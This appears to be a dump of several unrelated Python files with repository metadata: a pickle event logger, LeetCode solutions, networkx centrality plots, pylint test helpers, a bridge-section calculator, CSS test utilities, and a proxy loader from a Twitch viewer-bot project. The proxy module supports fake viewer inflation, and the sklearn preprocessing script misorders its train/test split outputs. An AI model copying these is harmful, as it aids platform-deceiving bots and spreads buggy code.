    def __init__(self):
        # os.path.join instead of '/'-concatenation for portability.
        log_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "gameEventLog")
        path = os.path.join(log_dir, str(time.time()) + ".txt")
        self.logfile = open(path, "wb")

    def log(self, funcParams):
        """Serialize one event record to the log file."""
        pickle.dump(funcParams, self.logfile, pickle.HIGHEST_PROTOCOL)

    def close(self):
        """Close the underlying file; the logger must not be used afterwards."""
        self.logfile.close()

    # Backward-compatible addition: allow `with GameEventLogger() as log:`
    # so the file is closed even when an exception escapes.
    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc, tb):
        self.close()
        return False
| true |
4c9da353eea5fba461175962f51a2915b8b9e546 | Python | vkvasu25/leetcode | /amazon/count_pairs_in_sorted_array.py | UTF-8 | 1,022 | 4.28125 | 4 | [] | no_license | """
https://www.youtube.com/watch?v=bptRLm3OiV8
given an array of numbers in sorted order
count the pairs of numbers whose sum is less than X
for example: [2,4,6,8,9], the x=14
"""
class Solution:
    def count_pairs(self, array, x):
        """Brute force: test every pair; O(n^2) time."""
        total = 0
        for i, left in enumerate(array):
            for right in array[i + 1:]:
                if left + right < x:
                    total += 1
        return total

    def count_pairs_smart(self, array, x):
        """Two-pointer scan over the sorted array; O(n) time."""
        lo, hi = 0, len(array) - 1
        total = 0
        while lo < hi:
            if array[lo] + array[hi] < x:
                # Every index in (lo, hi] pairs with lo under the bound.
                total += hi - lo
                lo += 1
            else:
                hi -= 1
        return total
# Smoke test: both variants count pairs summing below 14 in [2,4,6,8,9] (7).
sol = Solution()
print(sol.count_pairs([2,4,6,8,9],14))
print(sol.count_pairs_smart([2,4,6,8,9], 14))
8a4aec9df71de538ce74a8329c3f1484d2ea42f6 | Python | chenchals/interview_prep | /amazon/binary_tree_level_order_traversal.py | UTF-8 | 1,107 | 3.578125 | 4 | [] | no_license | # Definition for a binary tree node.
class TreeNode(object):
    """Binary tree node with a value and optional left/right children."""
    def __init__(self, x):
        # x: the node's value; children start empty.
        self.val = x
        self.left = None
        self.right = None
class Solution(object):
    def levelOrder(self, root):
        """
        Breadth-first traversal returning node values grouped by depth.
        :type root: TreeNode
        :rtype: List[List[int]]
        """
        if not root:
            return []
        levels = []
        current = [root]
        while current:
            levels.append([node.val for node in current])
            next_level = []
            for node in current:
                if node.left:
                    next_level.append(node.left)
                if node.right:
                    next_level.append(node.right)
            current = next_level
        return levels
| true |
12ae3e230711c635a750592e4057e98059571076 | Python | jbloomfeld/cs591finalproject | /data/DataPrep.py | UTF-8 | 4,726 | 3.265625 | 3 | [] | no_license | import numpy as np
import networkx as nx
import collections as c
import matplotlib.pyplot as plt
### Load Datasets
# Read the Les Miserables co-occurrence graph.
graphLM = nx.read_gml('lesmis.gml')
matrixLM = nx.to_scipy_sparse_matrix(graphLM)
# Layout a graph using the spring force algorithm.
nx.draw_spring(graphLM)
# Print the matrix.
plt.spy(matrixLM, precision=1e-3, marker='.', markersize=5)
### Fundamental Network Statistics
## Degree
# Column sums of the adjacency matrix = per-vertex degree (1 x n matrix).
degreeLM = matrixLM.sum(0)
# Plotting
# Degree Distribution
# NOTE(review): the next line computes a value and discards it (no-op).
np.squeeze(np.asarray(degreeLM))
plt.hist(np.squeeze(np.asarray(degreeLM)))
plt.title("Degree Distribution")
plt.xlabel("Degree")
plt.ylabel("Frequency")
# Degree Rank
plt.loglog(sorted(np.squeeze(np.asarray(degreeLM)), reverse=True), 'b-', marker='o')
plt.title("Degree Rank")
plt.ylabel("Degree")
plt.xlabel("Rank")
# Inset axes showing the largest connected component.
plt.axes([0.45,0.45,0.45,0.45])
# NOTE(review): connected_component_subgraphs was removed in newer
# networkx releases — confirm the pinned version supports it.
Gcc=max(nx.connected_component_subgraphs(graphLM), key=len)
pos=nx.spring_layout(Gcc)
plt.axis('off')
nx.draw_networkx_nodes(Gcc, pos, node_size=20)
nx.draw_networkx_edges(Gcc, pos, alpha=0.4)
# log Binning
# Based on: http://stackoverflow.com/questions/16489655/plotting-log-binned-network-degree-distributions
def drop_zeros(a_list):
    """Return only the strictly positive entries of *a_list*."""
    return list(filter(lambda value: value > 0, a_list))
# Frequency table: degree value -> number of vertices with that degree.
degreeLM_dict = dict(c.Counter(np.squeeze(np.asarray(degreeLM))))
max_x = np.log10(max(degreeLM_dict.keys()))
max_y = np.log10(max(degreeLM_dict.values()))
max_base = max([max_x,max_y])
min_x = np.log10(min(drop_zeros(degreeLM_dict.keys())))
# 10 logarithmically spaced bin edges; per-bin mean frequency / mean degree.
bins = np.logspace(min_x, max_base, num=10)
bin_means_y = (np.histogram(degreeLM_dict.keys(), bins, weights=degreeLM_dict.values())[0] / np.histogram(degreeLM_dict.keys(),bins)[0])
bin_means_x = (np.histogram(degreeLM_dict.keys(), bins, weights=degreeLM_dict.keys())[0] / np.histogram(degreeLM_dict.keys(),bins)[0])
plt.xscale('log')
plt.yscale('log')
plt.scatter(bin_means_x, bin_means_y, c='r', marker='s', s=50)
plt.xlim((0.75,70))
plt.ylim((.9,75))
plt.xlabel('Connections (normalized)')
plt.ylabel('Frequency')
# Cumulative Degree Distribution
# The cumulative degree distribution can simply be computed by:
# sorting the degrees of each vertex in descending order
# compute the corresponding ranks 1...n
# plot the rank divided by the number of vertices as a function or the degree
cumDegreeLM = np.array([np.sort(np.squeeze(np.asarray(degreeLM)))[::-1]])
# NOTE(review): np.float was removed in NumPy 1.24 — confirm pinned version.
cumDegreeLM = np.concatenate((cumDegreeLM, np.array([range(1, degreeLM.shape[1]+1)], dtype=np.float)), 0)
cumDegreeLM = np.concatenate((cumDegreeLM, np.array([cumDegreeLM[1]/degreeLM.shape[1]])), 0)
plt.loglog(cumDegreeLM[0,:], cumDegreeLM[2,:])
plt.title("Cumulative Degree Distribution")
plt.xlabel("Degree (k)")
plt.ylabel("$P(x \geq k)$")
## Get Minimum/Maximum Degrees
print([np.min(degreeLM), np.max(degreeLM)])
## Get Number of Edges
# Each undirected edge is counted twice in the adjacency-matrix sum.
edgesLM = matrixLM.sum()/2
print(edgesLM)
## Get Mean Degree
cLM = 2 * edgesLM/matrixLM.shape[0]
print(cLM)
## Get Density
rhoLM = cLM/(matrixLM.shape[0]-1.0)
print(rhoLM)
### Network Centrality
# NOTE(review): re-reads the graph from 'data/lesmis.gml' while the top of
# the script used 'lesmis.gml' — confirm which path is correct.
graphLM = nx.read_gml('data/lesmis.gml')
## Eigenvalue spectrum
spectrum = np.sort(nx.laplacian_spectrum(graphLM))
plt.plot(spectrum)
## Degree Centrality
degreeCentrality = nx.degree_centrality(graphLM)
layout=nx.spring_layout(graphLM,k=.2,iterations=1000, scale=5)
# Node colors: centrality normalized by the maximum value.
values = [degreeCentrality.get(node)/max(degreeCentrality.values()) for node in graphLM.nodes()]
nx.draw(graphLM, pos=layout, cmap = plt.get_cmap('jet'), node_color=values, with_labels=False)
plt.savefig('data/lesMiserables-degree-centrality.svg')
plt.savefig('data/lesMiserables-degree-centrality.pdf')
## Closeness
closenessCentrality = nx.closeness_centrality(graphLM)
values = [closenessCentrality.get(node)/max(closenessCentrality.values()) for node in graphLM.nodes()]
nx.draw(graphLM, pos=layout, cmap = plt.get_cmap('jet'), node_color=values, with_labels=False)
plt.savefig('data/lesMiserables-closeness-centrality.svg')
plt.savefig('data/lesMiserables-closeness-centrality.pdf')
## Betweenness
betweennessCentrality = nx.betweenness_centrality(graphLM)
values = [betweennessCentrality.get(node)/max(betweennessCentrality.values()) for node in graphLM.nodes()]
nx.draw(graphLM, pos=layout, cmap = plt.get_cmap('jet'), node_color=values, with_labels=False)
plt.savefig('data/lesMiserables-betweenness-centrality.svg')
plt.savefig('data/lesMiserables-betweenness-centrality.pdf')
## Eigenvector
eigenCentrality = nx.eigenvector_centrality(graphLM)
values = [eigenCentrality.get(node)/max(eigenCentrality.values()) for node in graphLM.nodes()]
nx.draw(graphLM, pos=layout, cmap = plt.get_cmap('jet'), node_color=values, with_labels=False)
plt.savefig('data/lesMiserables-eigen-centrality.svg')
plt.savefig('data/lesMiserables-eigen-centrality.pdf')
78765f2f64b6cb111c73e1143b3dd992c2908beb | Python | charles-lau520/python_study | /00_python_test/string.py | UTF-8 | 563 | 3.390625 | 3 | [] | no_license | #开发人员 :
#_+_coding: UTF-8_*_
#开发团队 : LC_Group
#开发人员 :
#开发时间 : 2020/8/24 16:21
#文件名称 : string.py
#开发工具 : PyCharm
a = "I LOVE PYTHON"
list = a.split()
print(list)
new_a = "-".join(list)
print(new_a)
b = "I LIKE {0} AND {1}".format("APPLE","ORANGE")
print(b)
# 占位符长度
# {0:10} 10个占位符
# {1:>15} 15个占位符并右对齐
b = "I LIKE {0:10} AND {1:^10} AND {2:>15}".format("APPLE","BANANA","ORANGE")
print(b)
c = "she is {0:4d} year old and {1:.1f}m hight".format(20,1.68)
print(c)
| true |
6814b32d50b3d5e83a7804600a9071a8c5af739f | Python | regisb/edx-lint | /test/plugins/pylint_test.py | UTF-8 | 4,313 | 2.90625 | 3 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | """Infrastructure for testing pylint plugins."""
import re
import textwrap
import warnings
from pylint.__pkginfo__ import numversion as pylint_numversion
from pylint.lint import Run
from pylint.reporters import CollectingReporter
def find_line_markers(source):
    """Scan *source* for `#=NAME` markers.

    Returns a dict mapping 1-based line numbers to the marker name found
    on that line.
    """
    found = {}
    for number, text in enumerate(source.splitlines(), start=1):
        match = re.search(r"#=(\w+)", text)
        if match is not None:
            found[number] = match.group(1)
    return found
def test_find_line_markers():
    """Markers map 1-based line numbers to the text after `#=`."""
    markers = find_line_markers(
        """\
        line 1 #=A
        line 2
        line 3 #=Hello
        """
    )
    assert markers == {1: "A", 3: "Hello"}
class SimpleReporter(CollectingReporter):
    """A pylint message reporter that collects the messages in a list."""
    # Pylint does not specify well what a reporter must do. This works.
    def _display(self, layout):
        # No-op: we only need the collected message list, not rendered output.
        pass
def run_pylint(source, msg_ids):
    """Run pylint on some source, collecting specific messages.
    `source` is the literal text of the program to check. It is
    dedented and written to a temp file for pylint to read.
    `msg_ids` is a comma-separated string of msgids we are interested
    in. Use "all" to enable all messages.
    Returns a set of messages. Each message is a string, formatted
    as "line:msg-id:message". "line" will be the line number of the
    message, or if the source line has a comment like "#=Slug", then
    it will be "Slug" instead. This makes it easier to write, read,
    and maintain the tests.
    """
    with open("source.py", "w") as f:
        f.write(textwrap.dedent(source))
    reporter = SimpleReporter()
    pylint_args = ["source.py", "--disable=all", "--enable={}".format(msg_ids)]
    # Pylint 2.x renamed Run's `exit` keyword to `do_exit`.
    if pylint_numversion >= (2, 0):
        kwargs = dict(do_exit=False)
    else:
        kwargs = dict(exit=False)
    Run(pylint_args, reporter=reporter, **kwargs)
    # Replace raw line numbers with their #=Slug markers where present.
    markers = find_line_markers(source)
    messages = {"{line}:{m.symbol}:{m.msg}".format(m=m, line=markers.get(m.line, m.line)) for m in reporter.messages}
    return messages
def test_that_we_can_test_pylint():
    """End-to-end check of run_pylint: enabled msgids fire, disabled ones don't."""
    # This tests that our pylint-testing function works properly.
    source = """\
        # There's no docstring, but we don't ask for that msgid,
        # so we won't get the warning.
        # Unused imports. We'll get warned about the first one,
        # but the second is disabled.
        import colorsys #=A
        import collections # pylint: disable=unused-import
        # Three warnings on the same line, two different messages.
        # redefined-builtin is checked by an IAstroidChecker.
        # anomalous-backslash-in-string is checked by an ITokenChecker.
        int = float = "\\a\\b\\c" #=B
        # TODO is checked by an IRawChecker. #=C
        """
    msg_ids = "unused-import,redefined-builtin,anomalous-backslash-in-string,fixme"
    with warnings.catch_warnings():
        # We want pylint to find the bad \c escape, but we don't want Python to warn about it.
        warnings.filterwarnings(action="ignore", category=DeprecationWarning, message="invalid escape")
        messages = run_pylint(source, msg_ids)
    expected = {
        "A:unused-import:Unused import colorsys",
        "B:redefined-builtin:Redefining built-in 'int'",
        "B:redefined-builtin:Redefining built-in 'float'",
        "B:anomalous-backslash-in-string:Anomalous backslash in string: '\\c'. "
        "String constant might be missing an r prefix.",
        "C:fixme:TODO is checked by an IRawChecker. #=C",
    }
    assert expected == messages
def test_invalid_python():
    """Non-Python input should yield exactly one syntax-error message."""
    source = """\
        This isn't even Python, what will pylint do?
    """
    messages = run_pylint(source, "all")
    assert len(messages) == 1
    message = messages.pop()
    # Pylint 1.x says the source is <string>, Pylint 2.x says <unknown>
    message = message.replace("<string>", "XXX").replace("<unknown>", "XXX")
    assert message == "1:syntax-error:invalid syntax (XXX, line 1)"
# I would have tested that the msgids must be valid, but pylint doesn't seem
# to mind being told to enable non-existent msgids.
| true |
477e8a2c82af26f45cf57eff3d43475371d0bfc0 | Python | ethanhinch/AdventofCode2020 | /Day 2/PWPhilosophy.py | UTF-8 | 991 | 3.8125 | 4 | [] | no_license | #Take inputs from file and store them
def getInputs():
    """Read day2.txt and return its lines (trailing newlines preserved).

    Uses a context manager so the file handle is always closed
    (the original version leaked it).
    """
    with open("day2.txt", "r") as f:
        return list(f)
#Convert the input strings into usable form:
# Integer lower and upper bounds, the restricted letter and the password
def parse(string):
sections = string.split(': ')
rule = sections[0].split(' ')
bounds = rule[0].split('-')
bounds[0] = int(bounds[0])
bounds[1] = int(bounds[1])
return [bounds[0], bounds[1], rule[1], sections[1]]
#Count the frequency of the letter in the string
def countFrequency(letter, string):
    """Count how many characters of *string* equal *letter*."""
    return sum(1 for ch in string if ch == letter)
#Initialise
inputs = getInputs()
correct = 0
#Process each input and determine if rule is broken or not
for i in range(0, len(inputs)):
    parts = parse(inputs[i])
    # parts = [low, high, letter, password]
    count = countFrequency(parts[2], parts[3])
    # Valid when the letter's count lies within [low, high].
    if(count >= parts[0] and count <= parts[1]):
        correct += 1
print(correct)
98784a5979116472595c5d32c9e5a6e836983028 | Python | breuerfelix/twitch-viewer-bot | /proxies/hideme.py | UTF-8 | 1,986 | 2.71875 | 3 | [
"MIT"
] | permissive | import csv
import time
import sys
if __name__ == "__main__":
from utils import test_proxy, validate_ip
else:
from .utils import test_proxy, validate_ip
# export list from https://hidemy.name/en/proxy-list as csv
FILENAME = "hideme_proxy_export.csv"
def start_hideme_thread(callback):
    """Feed working hideme proxies to *callback*, one at a time.

    Loads the exported CSV once, then walks through the proxies; each
    proxy that passes ``test_proxy`` is handed to ``callback``.  The
    process exits when the list is exhausted or loading fails.

    :param callback: one-argument callable receiving a proxy URL string.
    """
    get_new = _init_proxies(FILENAME)
    while True:
        try:
            proxy = get_new()
            if proxy is None:
                # BUG FIX: raising a plain string (as the original did) is a
                # TypeError in Python 3, which masked the real message; use a
                # proper exception so "no proxy found" reaches the handler.
                raise RuntimeError("no proxy found")
        except Exception as e:
            print("hideme error", e)
            sys.exit(0)
        if test_proxy(proxy):
            callback(proxy)
def _init_proxies(filename):
    """Load proxy rows from a hidemy.name CSV export.

    :param filename: path to the ';'-separated CSV export.
    :return: a zero-argument closure yielding one "scheme://ip:port"
        string per call, and None once the list is exhausted.
    """
    proxies = []
    with open(filename, "r") as csv_file:
        csv_reader = csv.DictReader(csv_file, delimiter=";")
        for line, row in enumerate(csv_reader):
            # NOTE(review): DictReader has already consumed the header row,
            # so skipping index 0 here drops the FIRST DATA ROW — confirm
            # whether the export really contains a second header line.
            if line == 0:
                continue
            proxies.append(row)
    print(f"loaded {len(proxies)} hideme proxies")
    counter = 0

    def get_new():
        # Walk the list exactly once; the scheme flags are checked in
        # order, so a later flag ("socks5") overrides an earlier one
        # when several are set to "1".
        nonlocal counter
        if counter >= len(proxies):
            return None
        row = proxies[counter]
        scheme = None
        if row["http"] == "1":
            scheme = "http"
        if row["ssl"] == "1":
            scheme = "https"
        if row["socks4"] == "1":
            scheme = "socks4"
        if row["socks5"] == "1":
            scheme = "socks5"
        proxy = f"{scheme}://{row['ip']}:{row['port']}"
        counter += 1
        return proxy

    return get_new
if __name__ == "__main__":
    # Standalone mode: filter the exported list down to working proxies
    # and append each responsive one to working_hideme.txt.
    # extract working proxies for test here
    get_new = _init_proxies(FILENAME)
    while True:
        try:
            proxy = get_new()
            if proxy == None:
                print("no more proxies left")
                break
        except Exception as e:
            print("hideme error", e)
            sys.exit(0)
        # 3 = timeout (seconds) passed to test_proxy.
        if test_proxy(proxy, 3):
            with open("working_hideme.txt", "a") as file:
                file.write(proxy + "\n")
| true |
9bf874b452733c72a3b64749ac8ab382d36d2a38 | Python | FrankieZhen/Lookoop | /Image/OpenCV/Chapter5-笔记.py | UTF-8 | 2,007 | 2.703125 | 3 | [] | no_license | # 2018-9-6
# OpenCV3 计算机视觉 Python语言实现
# Github : https://github.com/techfort/pycv
# 英文教程: https://docs.opencv.org/3.2.0/d6/d00/tutorial_py_root.html
# 中文翻译: https://www.cnblogs.com/Undo-self-blog/p/8423851.html
# opencv中文教程: https://www.kancloud.cn/aollo/aolloopencv/272892
# 第五章笔记
import numpy as np
import matplotlib.pyplot
import scipy.special
import os
import cv2
from scipy import ndimage
# import cv # 已经被遗弃
# Live face detection from the webcam.
def detect():
    """Show live face + eye detection from the first webcam; press 'q' to quit."""
    face_cascade = cv2.CascadeClassifier("data/haarcascade_frontalface_default.xml")
    eye_cascade = cv2.CascadeClassifier("data/haarcascade_eye.xml")
    cam = cv2.VideoCapture(0)  # device 0 = first camera
    while True:
        ok, frame = cam.read()  # ok: whether a frame was grabbed; frame: the image
        # Haar cascades operate on grayscale images.
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        # 1.3 = image pyramid scale factor, 5 = min neighbours to keep a hit.
        found_faces = face_cascade.detectMultiScale(gray, 1.3, 5)
        for fx, fy, fw, fh in found_faces:
            cv2.rectangle(frame, (fx, fy), (fx + fw, fy + fh), (250, 0, 0), 2)
            # Search for eyes only inside the detected face region.
            roi = gray[fy:fy + fh, fx:fx + fw]
            # (40, 40) minimum size suppresses false-positive "eyes".
            found_eyes = eye_cascade.detectMultiScale(roi, 1.03, 5, 0, (40, 40))
            for ex, ey, ew, eh in found_eyes:
                cv2.rectangle(frame, (fx + ex, fy + ey),
                              (fx + ex + ew, fy + ey + eh), (0, 255, 0), 2)
        cv2.imshow("face", frame)
        # ~12 fps; quit on 'q'.
        if cv2.waitKey(1000 // 12) & 0xff == ord("q"):
            break
    cam.release()
    cv2.destroyAllWindows()
if __name__ == "__main__":
    # Run the webcam demo only when executed as a script.
    detect()
# 人脸识别见 face_detect 文件夹
| true |
e8921d1f41753ee07242366aea5a1db4ac5ac5b4 | Python | anagharumade/ML-Projects | /Machine-Learning-with-Python-R/Data Preprocessing/Feature_Scaling.py | UTF-8 | 1,166 | 3.109375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Sat Oct 14 17:06:08 2017
@author: absol
"""
import pandas as pd
#importing dataset
data = pd.read_csv('data.csv')
#Splitting dataset into Dependent and independent variables
X = data.iloc[:, :-1].values
Y = data.iloc[:, 3].values
#Dealing with missing values
from sklearn.preprocessing import Imputer
imputer = Imputer(missing_values = 'NaN', axis = 0, strategy = 'mean')
imputer = imputer.fit(X[:, 1:3])
X[:, 1:3] = imputer.transform(X[:, 1:3])
#Categorical variables
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder = LabelEncoder()
X[:, 0] = labelencoder.fit_transform(X[:, 0])
onehotencoder = OneHotEncoder(categorical_features = [0])
X = onehotencoder.fit_transform(X).toarray()
labelencoder = LabelEncoder()
Y = labelencoder.fit_transform(Y)
#Splitting into training and testing data
from sklearn.cross_validation import train_test_split
X_train, Y_train, X_test, Y_test = train_test_split(X, Y, test_size = 0.2)
#Feature Scaling
from sklearn.preprocessing import StandardScaler
scaler_X = StandardScaler()
X_train = scaler_X.fit_transform(X_train)
Y_train = scaler_X.transform(Y_train) | true |
5187abacea26139fe8f93da4576ade47cdca9917 | Python | devesh-bhushan/python-assignments | /assignment-1/Q-8 class_marks.py | UTF-8 | 656 | 3.828125 | 4 | [] | no_license | """
program to calculate average marks and pecentage
"""
sub_1 = eval(input("enter the marks obtained in subject 1"))
sub_2 = eval(input("enter the marks obtained in subject 2"))
sub_3 = eval(input("enter the marks obtained in subject 3"))
sub_4 = eval(input("enter the marks obtained in subject 4"))
sub_5 = eval(input("enter the marks obtained in subject 5"))
totMks = sub_1+sub_2+sub_3+sub_4+sub_5
avg = totMks/5 # calculating the average of marks
per = totMks/5 # calculating the percentage
print("total marks are", totMks)
print("average of marks is", avg)
print("percentage of marks is", per) | true |
6659c5be5ce014b9258020c4b7441e6c034f1b89 | Python | LauraSiobhan/beginning_python_jul2021 | /exercise_13_1.py | UTF-8 | 433 | 4 | 4 | [] | no_license | my_string = 'hello world'
# print out "hello"
print(my_string[:5])
# print out "world"
print(my_string[6:])
# print it backwards
print(my_string[::-1])
my_list = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']
my_slice = my_list[2:7]
print(my_slice)
new_list = my_list
new_list[3] = 'z'
print(my_list)
my_list = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']
new_list = my_list[:]
new_list[3] = 'z'
print(my_list)
print(new_list)
| true |
55c39385ada91f723982c0e62433f23fe3dc0b1b | Python | Woodman5/ncc_calc | /src/stuff/count_sections.py | UTF-8 | 9,197 | 2.96875 | 3 | [
"MIT"
] | permissive | import pprint
import re
regex = r"[^\d-]+"
pp = pprint.PrettyPrinter(width=38, compact=True)
blength = int(input('Длина моста в мм: '))
gap_qty = int(input('Количество деформационных швов: '))
print('Укажите ширину деформационных швов слева направо через пробел.\nЕсли все одинаковые, укажите ширину 1 раз.')
while True:
text = input('Ширина, мм: ')
text = (re.sub(regex, ' ', text)).strip()
if text:
gap_wdth = [int(x) for x in text.split(' ') if int(x) > 0]
if len(text.split(' ')) == 1:
gap_wdth = [gap_wdth[0]] * gap_qty
break
if len(gap_wdth) != gap_qty:
print(f'Количество размеров в {gap_wdth} не совпадает с количеством швов.\nВведите данные еще раз.')
continue
break
before_gap_l = int(input('Отступ от стоек до швов слева в мм (стандартно 250 мм): '))
before_gap_r = int(input('Отступ от стоек до швов справа в мм (стандартно 250 мм): '))
while True:
text = input('Эти размеры фиксированы и не могут быть измененны? y/n ')
if text == 'y':
bgl_fix = True
break
elif text == 'n':
bgl_fix = False
break
continue
pillar_dist = int(input('Расстояние между опорами в регулярной секции в мм (стандартно 1500 мм): '))
overhang_end_l = int(input('Свес концевой левой секции в мм (стандартно 252 мм): '))
overhang_end_r = int(input('Свес концевой правой секции в мм(стандартно 252 мм): '))
print('Укажите длины участков моста до и между дефшвами слева направо')
lenth_list = []
for i in range(gap_qty + 1):
len4 = blength - sum(lenth_list) - sum(gap_wdth[:i])
if i < gap_qty:
while True:
len1 = int(input(f'Длина участка {i + 1} в мм: '))
len2 = overhang_end_l + before_gap_l
len3 = overhang_end_r + before_gap_r
if i == 0 and len1 < len2 or i == gap_qty and len4 < len3:
print('Первый или последний участок не может быть короче суммы длин отступа и свеса')
continue
lenth_list.append(len1)
break
print(f'До правого конца моста осталось {len4} мм')
continue
print(f'Последний участок длиной {len4} мм добавлен автоматически')
lenth_list.append(len4)
pp.pprint(lenth_list)
bridge = []
for i, value in enumerate(lenth_list):
if i == 0:
reg_qty, irreg_len = divmod(value - overhang_end_l - before_gap_l, pillar_dist)
print(f'Участок моста 1: кол-во регулярных - {reg_qty}, остаток - {irreg_len}')
if reg_qty == 0:
if irreg_len < 500:
before_gap_l_temp = before_gap_l
if bgl_fix:
overhang_end_l += irreg_len
else:
x = irreg_len // 2
overhang_end_l += x
before_gap_l_temp += irreg_len - x
bridge.append(('L_end_1pillow_gap_section', 1, 0, overhang_end_l, before_gap_l_temp))
if irreg_len >= 500:
bridge.append(('L_end_2pillows_gap_section', 1, irreg_len, overhang_end_l, before_gap_l))
if reg_qty == 1:
if irreg_len < 500:
pillar_dist1 = (pillar_dist + irreg_len) // 2
pillar_dist2 = pillar_dist + irreg_len - pillar_dist1
bridge.append(('L_end_section', 1, pillar_dist1, overhang_end_l, 0))
bridge.append(('L_gap_section', 1, pillar_dist2, 0, before_gap_l))
if irreg_len >= 500:
bridge.append(('L_end_section', 1, pillar_dist, overhang_end_l, 0))
bridge.append(('L_gap_section', 1, irreg_len, 0, before_gap_l))
if reg_qty >= 2:
if irreg_len < 500:
pillar_dist1 = (pillar_dist + irreg_len) // 2
pillar_dist2 = pillar_dist + irreg_len - pillar_dist1
bridge.append(('L_end_section', 1, pillar_dist, overhang_end_l, 0))
if reg_qty - 2 == 0:
bridge.append(('Ireg_section', 1, pillar_dist1, 0, 0))
bridge.append(('L_gap_section', 1, pillar_dist2, 0, before_gap_l))
else:
bridge.append(('Reg_section', reg_qty - 2, pillar_dist, 0, 0))
bridge.append(('Ireg_section', 1, pillar_dist1, 0, 0))
bridge.append(('L_gap_section', 1, pillar_dist2, 0, before_gap_l))
if irreg_len >= 500:
bridge.append(('L_end_section', 1, pillar_dist, overhang_end_l, 0))
bridge.append(('Reg_section', reg_qty - 1, pillar_dist, 0, 0))
bridge.append(('L_gap_section', 1, irreg_len, 0, before_gap_l))
elif i == len(lenth_list) - 1:
reg_qty, irreg_len = divmod(value - overhang_end_r - before_gap_r, pillar_dist)
print(f'Последний участок моста: кол-во регулярных - {reg_qty}, остаток - {irreg_len}')
if reg_qty == 0:
if irreg_len < 500:
before_gap_r_temp = before_gap_r
if bgl_fix:
overhang_end_r += irreg_len
else:
x = irreg_len // 2
overhang_end_r += x
before_gap_r_temp += irreg_len - x
bridge.append(('R_end_1pillow_gap_section', 1, 0, before_gap_r_temp, overhang_end_r))
if irreg_len >= 500:
bridge.append(('R_end_2pillows_gap_section', 1, irreg_len, before_gap_r, overhang_end_r))
if reg_qty == 1:
if irreg_len < 500:
pillar_dist1 = (pillar_dist + irreg_len) // 2
pillar_dist2 = pillar_dist + irreg_len - pillar_dist1
bridge.append(('R_gap_section', 1, pillar_dist1, before_gap_r, 0))
bridge.append(('R_end_section', 1, pillar_dist2, 0, overhang_end_r))
if irreg_len >= 500:
bridge.append(('R_gap_section', 1, irreg_len, before_gap_r, 0))
bridge.append(('R_end_section', 1, pillar_dist, 0, overhang_end_r))
if reg_qty >= 2:
if irreg_len < 500:
pillar_dist1 = (pillar_dist + irreg_len) // 2
pillar_dist2 = pillar_dist + irreg_len - pillar_dist1
if reg_qty - 2 == 0:
bridge.append(('R_gap_section', 1, pillar_dist1, before_gap_r, 0))
bridge.append(('Ireg_section', 1, pillar_dist2, 0, 0))
else:
bridge.append(('R_gap_section', 1, pillar_dist1, before_gap_r, 0))
bridge.append(('Ireg_section', 1, pillar_dist2, 0, 0))
bridge.append(('Reg_section', reg_qty - 2, pillar_dist, 0, 0))
bridge.append(('R_end_section', 1, pillar_dist, 0, overhang_end_r))
if irreg_len >= 500:
bridge.append(('R_gap_section', 1, irreg_len, before_gap_r, 0))
bridge.append(('Reg_section', reg_qty - 1, pillar_dist, 0, 0))
bridge.append(('R_end_section', 1, pillar_dist, 0, overhang_end_r))
else:
reg_qty, irreg_len = divmod(value - before_gap_r - before_gap_l, pillar_dist)
print(f'Участок моста {i + 1}: кол-во регулярных - {reg_qty}, остаток - {irreg_len}')
if reg_qty == 0:
pass
if reg_qty == 1:
pass
if reg_qty >= 2:
if irreg_len < 500:
pillar_dist1 = (pillar_dist + irreg_len) // 2
pillar_dist2 = pillar_dist + irreg_len - pillar_dist1
bridge.append(('R_gap_section', 1, pillar_dist1, before_gap_r, 0))
# if reg_qty - 2 == 0:
# bridge.append(('Ireg_section', 1, pillar_dist1, 0, 0))
# bridge.append(('L_gap_section', 1, pillar_dist2, 0, before_gap_l))
# else:
bridge.append(('Reg_section', reg_qty - 1, pillar_dist, 0, 0))
bridge.append(('L_gap_section', 1, pillar_dist2, 0, before_gap_l))
if irreg_len >= 500:
bridge.append(('R_gap_section', 1, pillar_dist, before_gap_r, 0))
bridge.append(('Reg_section', reg_qty - 1, pillar_dist, 0, 0))
bridge.append(('L_gap_section', 1, irreg_len, 0, before_gap_l))
print('\nРезультат:\nНазвание секции | количество | длина между опор | вылет слева | вылет справа')
pp.pprint(bridge)
| true |
e0dc0f048626a027db37f22d610536fd6a720e7b | Python | jaspalsingh92/TestAutomation-1 | /framework/Shared/css_utils.py | UTF-8 | 7,611 | 2.9375 | 3 | [] | no_license | # css_utils.py
import re
import logging
from Utils.ssh_util import SshUtil
# Module-wide loggers: 'framework' for internal tracing, 'test' for
# messages that should also appear in the test report.
logger = logging.getLogger('framework')
test_logger = logging.getLogger('test')

###### CSS Utilities ######
def log_assert(test, error):
    """Assert *test*; on failure, record the message in both logs first.

    :param test: Some sort of test
    :param error: Error message to show if test is false
    """
    if not test:
        failure_line = "ASSERT %s" % error
        logger.info(failure_line)
        test_logger.info(failure_line)
    assert test, error
def log_ok_or_assert(test, ok, error):
    """Log *ok* when *test* holds, otherwise log the error and assert.

    :param test: Some sort of test
    :param ok: OK message to show if test is true
    :param error: Error message to show if test is false
    """
    message = ok if test else "ASSERT %s" % error
    logger.info(message)
    test_logger.info(message)
    assert test, error
def get_version(content):
    """Extract a version string of the form "d.d.d-ddd" from the content.

    :param content: Content
    :return: Version string if found, None otherwise.
    """
    # BUG FIX: the middle separator was an unescaped '.' in the original
    # pattern, which matched ANY character (e.g. "1.2x3-456"); escape it so
    # only a literal dot is accepted.
    x = re.search(r"\b(\d\.\d\.\d-\d\d\d)\b", content)
    if x:
        version = x.group(1)
        logger.debug("version = %s" % version)
        return version
    else:
        return None
def get_basename(cmd):
    """Get the basename of a command.

    The last whitespace-separated token of *cmd* is taken, then anything
    up to its final '/' is stripped off.

    :param cmd: Command string (possibly with arguments and a path)
    :return: The basename of the command
    """
    last_token = cmd[cmd.rfind(" ") + 1:]
    return last_token[last_token.rfind("/") + 1:]
def check_substring(content, substring, ignorecase=False):
